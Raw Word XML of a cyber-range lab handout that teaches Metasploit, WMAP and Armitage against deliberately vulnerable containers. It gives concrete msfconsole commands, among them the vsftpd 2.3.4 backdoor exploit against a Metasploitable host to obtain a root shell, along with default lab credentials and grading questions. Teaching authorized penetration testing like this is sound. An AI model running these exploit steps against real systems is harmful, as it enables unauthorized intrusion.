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09 — How to Exploit a Target with the Metasploit Framework and Armitage</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Docker-based cyber range. Lab 9 focuses on: turning a confirmed vulnerability into a demonstrated compromise with Metasploit and Armitage.</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Initialize the Metasploit database and drive msfconsole's core workflow (search, use, set, run).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>• Run the WMAP web-scanning module against a web target and review the findings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>• Configure and launch a matching exploit against the authorized victim host and interpret the result.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>• Reproduce the same workflow visually in Armitage and compare it to the console.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="0"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Tools used in this lab (4,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Metasploit Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4770"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Exploit development and execution framework — CEH “System Hacking” domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4770"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>msfconsole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4770"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>The primary command interface for searching, configuring, and running modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4770"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>WMAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4770"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Metasploit's web-application vulnerability scanning module</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4770"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Armitage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4770"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Graphical front-end for Metasploit — host discovery, attack matching, and visualization</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Metasploit is the reference framework for turning a confirmed vulnerability into a demonstrated impact; operating it under strict scope is the proof step a vulnerability assessment builds toward.</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(Kali + XFCE/RDP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1908"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>10.10.0.10 (internet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1908"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Kali Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1908"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>root / cyberrange</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1908"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>dvwa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1908"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Web app + LAN pivot (dual-homed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1908"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>10.20.0.12 · 10.30.0.12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1908"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>DVWA (:80)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1908"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>app: admin / password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1908"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>metasploitable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1908"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vulnerable Linux (LAN, via pivot)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1908"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>10.30.0.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1908"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Metasploitable 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1908"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>msfadmin / msfadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5760720" cy="3210301"/>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10301"/>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Reaching the target in this lab</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>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Initialize the Metasploit database and drive msfconsole's core workflow (search, use, set, run).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>• Run the WMAP web-scanning module against a web target and review the findings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>• Configure and launch a matching exploit against the authorized victim host and interpret the result.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>• Reproduce the same workflow visually in Armitage and compare it to the console.</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“You've found the weaknesses and scored them,” Nadia says. “Now the hard question from the board: ‘can someone actually get in?’ A CVSS number is a prediction; a shell is proof. I want you to demonstrate impact on the range's vulnerable host — carefully, and only there.”</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="243027"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>She sets the guardrails. “Metasploit is the real thing, so scope discipline is everything: the victim container on our range, nothing else, ever. Learn the console first so you understand each option you set — then let Armitage show you the same workflow as a picture. A shell you can't explain is worse than no shell.”</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="243027"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Your task: scan the dvwa web app from Metasploit, then configure and run a matching exploit against the victim host, and reproduce the workflow visually in Armitage.</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Initialize the database and open the console.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>msfdb init &amp;&amp; msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ Expected: the msf6 &gt; prompt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. Scan the web app with WMAP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>load wmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>wmap_sites -a http://10.20.0.12</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>wmap_targets -t http://10.20.0.12</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>wmap_run -e</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ Expected: WMAP reporting web findings on dvwa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. Search for an exploit matching a victim service.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search vsftpd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ Expected: the vsftpd 2.3.4 backdoor module (Metasploitable runs this).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4. Select it, set the target, and run.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>set RHOSTS 10.30.0.20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ Expected: a command session opening on the victim.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>5. Confirm the session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sessions -i 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ Expected: command output proving you have a shell (e.g. uid=0(root)).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>6. On the RDP desktop, open Armitage, add and scan 10.30.0.20, then Attacks → Find Attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ Expected: the host on the graphical map with matched attacks — the same workflow, visualized.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Practice: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Open a second exploit module's options with show options and explain what each required field does.</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Connect to the attacker's graphical desktop over RDP (point a Remote Desktop client at 127.0.0.1:3389, user root, password cyberrange) and open a terminal — this lab uses GUI tools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. Initialize the Metasploit database (msfdb init), start the PostgreSQL service, then launch msfconsole.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. Get oriented: display a banner, review help, and confirm you can still run shell commands (such as ip addr) from within the console.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4. Load and run the WMAP web-scanning module against the dvwa host (http://10.20.0.12): register the site as a target, run the scan, and review the vulnerabilities it reports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>5. Search Metasploit for an exploit module that matches a service running on the victim host (10.30.0.20). Read its info and show options.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>6. Configure the exploit: set RHOSTS to the victim host, choose and set a compatible payload, set any required options (LHOST = the attacker's 10.10.0.10, ports), then run it and interpret the result (session opened, or why not).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>7. Launch Armitage and let it connect to the Metasploit service. Add and scan the victim host so it appears on the graphical map.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>8. Use Armitage's Attacks &gt; Find Attacks to match modules to the host, launch one, and compare the visual workflow to the console steps you ran by hand.</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Order matters: msfdb init -&gt; service postgresql start -&gt; msfconsole; the database makes search and hosts tracking work. WMAP is a plugin: load wmap, then wmap_sites -a, wmap_targets -t, and wmap_run -e. For any module, show options lists what must be set; RHOSTS is the target, LHOST is your attacker address (10.10.0.10) for reverse payloads. search, use, set, and exploit are the four verbs that drive almost every Metasploit session. The victim container (Metasploitable 2) runs many classic exploitable services — pick a service your earlier scans confirmed. Armitage needs the Metasploit RPC/database running first; then Hosts &gt; Add Hosts and a scan populate the map.</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A CVSS score is a prediction; a shell is proof. Demonstrate impact on the victim — and only the victim.</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vulnerable service and version you exploited.</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The uid you obtained on the victim.</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victim's hostname as seen from your session.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="0"/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Total: 50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Metasploit collapses the distance between ‘this is vulnerable’ and ‘this is compromised,’ which is exactly why scope discipline is the first skill, not the last. The console teaches you what every option means; Armitage makes the same logic legible at a glance for a report or a briefing. A demonstrated session is the most persuasive artifact in an assessment — it turns a risk score into a fact the board can't wave away — but its entire legitimacy rests on the words ‘only the host we were authorized to test.’</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your WMAP scan results against the dvwa host inside msfconsole.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>• Screenshot of a configured exploit module (show options with RHOSTS/payload set) before you run it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="243027"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>• Screenshot of the exploitation result (an opened session, or the module's output explaining the outcome).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
